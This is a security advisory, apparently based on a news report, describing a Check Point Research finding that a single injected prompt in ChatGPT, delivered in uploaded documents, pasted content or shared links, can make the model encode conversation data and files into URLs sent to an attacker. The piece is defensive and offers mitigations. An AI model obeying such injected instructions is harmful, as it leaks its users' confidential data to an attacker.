Key Takeaway
Check Point Research disclosed a prompt injection vulnerability in OpenAI ChatGPT that allowed a single malicious prompt to silently exfiltrate user messages, uploaded files, and other session data without user knowledge. The flaw requires no authentication beyond a standard ChatGPT session and carries low attack complexity. Organizations should restrict file uploads, avoid using ChatGPT for sensitive data processing, and monitor OpenAI's security advisories for patch confirmation.
ChatGPT Vulnerability Allowed Silent Exfiltration of Conversations and Uploaded Files
Affected Product: OpenAI ChatGPT (web and potentially API-accessible interfaces) Vulnerability Type: Prompt Injection / Covert Data Exfiltration Researcher: Check Point Research CVE Status: Not yet assigned at time of publication
Vulnerability Overview
Check Point Research disclosed a previously unknown vulnerability in OpenAI's ChatGPT that allowed a malicious prompt to silently exfiltrate sensitive user data — including conversation history and uploaded files — without the user's knowledge or consent.
The flaw is classified as a prompt injection attack. In this attack class, adversarial instructions embedded in user-supplied or third-party content manipulate the model into executing unintended actions. In this case, a single crafted prompt was sufficient to transform a normal ChatGPT session into a covert exfiltration channel.
According to Check Point, the attack could leak:
- User messages from the active conversation
- Uploaded files submitted during the session
- Other sensitive session content present in the model's context window
No CVE identifier has been publicly assigned as of this writing. CVSS scoring has not been published, though the attack vector is network-based, requires no authentication beyond initiating a ChatGPT session, and carries low attack complexity — factors that would typically place it in the high-severity range.
Technical Detail
Prompt injection against large language models (LLMs) exploits the model's inability to reliably distinguish between legitimate system instructions and adversarial instructions injected through user input or retrieved content. When ChatGPT processes a malicious prompt — whether typed directly or embedded in a document the user uploads — the model can be instructed to encode and transmit context-window data to an attacker-controlled endpoint.
The exfiltration mechanism likely leverages the model's ability to generate URLs or make references that, when rendered or followed by a browser or plugin, send data outbound. This technique has been demonstrated in prior research against other LLM-integrated tools, but Check Point's findings apply it specifically to ChatGPT's handling of uploaded files and multi-turn conversations.
The attack requires no elevated privileges and no vulnerability in the underlying operating system or browser. The user does not need to click a link or install anything. The malicious prompt does the work inside the model's inference loop.
Real-World Impact
Organizations that permit employees to use ChatGPT for work tasks — reviewing contracts, drafting code, analyzing documents — face direct exposure. A user who uploads a sensitive file (financial data, source code, personally identifiable information, legal documents) and then encounters a malicious prompt in the same session could have that content exfiltrated transparently.
Attack delivery vectors include:
- Malicious documents uploaded by the user — a PDF or DOCX containing injected instructions
- Adversarial content pasted into the chat — copied from a compromised webpage or email
- Shared conversation links — if a crafted conversation is shared with a target user
Enterprises using ChatGPT via the API in automated pipelines face additional risk, as injected instructions in processed third-party content could exfiltrate data at scale without any human reviewing the output.
This class of vulnerability is particularly damaging in environments where ChatGPT has been integrated with tools, plugins, or retrieval-augmented generation (RAG) pipelines, since the model may have access to a broader data surface than a standalone chat session.
OpenAI Response
Check Point reported the vulnerability to OpenAI through responsible disclosure. OpenAI has acknowledged the report. Specific patch details, timeline, and confirmation of remediation were not publicly available at the time of this writing. Organizations should monitor OpenAI's security advisories at security.openai.com for updates.
Mitigation and Recommended Actions
For enterprises and security teams:
-
Restrict file uploads — Disable or limit ChatGPT file upload functionality for employees through OpenAI's administrative controls until full remediation is confirmed.
-
Enforce ChatGPT Enterprise data controls — If using ChatGPT Enterprise, verify that conversation data retention and training opt-outs are configured per your data handling policies.
-
Block ChatGPT access for sensitive workflows — Do not use consumer ChatGPT interfaces for processing confidential documents, PII, source code, or legally privileged material.
-
Audit LLM integration pipelines — Review any automated workflows that pass third-party content into ChatGPT or any other LLM. Treat all retrieved or user-supplied content as potentially adversarial.
-
Apply output filtering — Where ChatGPT output is processed programmatically, implement output validation to detect anomalous URL generation or encoded data patterns that may indicate exfiltration attempts.
-
Monitor for CVE assignment — Track the National Vulnerability Database (NVD) and OpenAI's disclosure channels for an official CVE ID and associated patch guidance.
For SOC analysts:
Flag outbound HTTP requests originating from browser sessions to unrecognized or newly registered domains immediately following ChatGPT usage. Prompt injection exfiltration typically generates anomalous GET requests with encoded query parameters carrying conversation data.
Check Point's full technical write-up is expected to include proof-of-concept detail. Security teams should treat this disclosure as active risk until OpenAI confirms a complete fix is deployed across all affected surfaces.
Original Source
The Hacker News
Related Articles
CVE Pending: Critical Vulnerability in Anthropic's Claude Code Discovered Days After Source Code Leak
Adversa AI discovered a critical vulnerability in Anthropic's Claude Code agentic coding assistant within days of Anthropic accidentally leaking the product's source code. Claude Code operates with elevated system privileges in developer environments, making exploitation potentially severe — including credential theft, CI/CD pipeline manipulation, and lateral movement. Organizations should audit deployments, rotate credentials, and apply patches immediately once Anthropic releases a fix.
CVE-2024-6387: OpenSSH regreSSHion RCE Flaw Exposes Millions of Linux Servers to Unauthenticated Root Access
CVE-2024-6387 (regreSSHion) is a signal handler race condition in OpenSSH sshd versions 8.5p1 through 9.7p1 that allows unauthenticated remote code execution as root. Discovered by Qualys, the flaw affects an estimated 700,000 publicly exposed servers. Administrators should upgrade to OpenSSH 9.8p1 immediately or set LoginGraceTime 0 as a temporary workaround.
Apple Expands DarkSword Exploit Kit Mitigations Across Device Fleet After State-Sponsored and Spyware Vendor Abuse
Apple has expanded mitigations against the DarkSword exploit kit to additional devices after the toolkit was used in operations by state-sponsored threat groups and commercial spyware vendors. The expansion follows Apple's standard model of phased protection rollouts across its device ecosystem. All Apple device owners should apply the latest OS updates immediately, and high-risk individuals should enable Lockdown Mode.
CVE-2026-20093: Critical Cisco IMC Authentication Bypass Carries CVSS 9.8
Cisco has patched CVE-2026-20093, a critical authentication bypass vulnerability in the Cisco Integrated Management Controller (IMC) with a CVSS score of 9.8. An unauthenticated remote attacker can exploit the flaw to bypass authentication and gain elevated privileges over affected hardware management interfaces. Administrators should apply Cisco's patch immediately and restrict IMC network access to isolated management VLANs.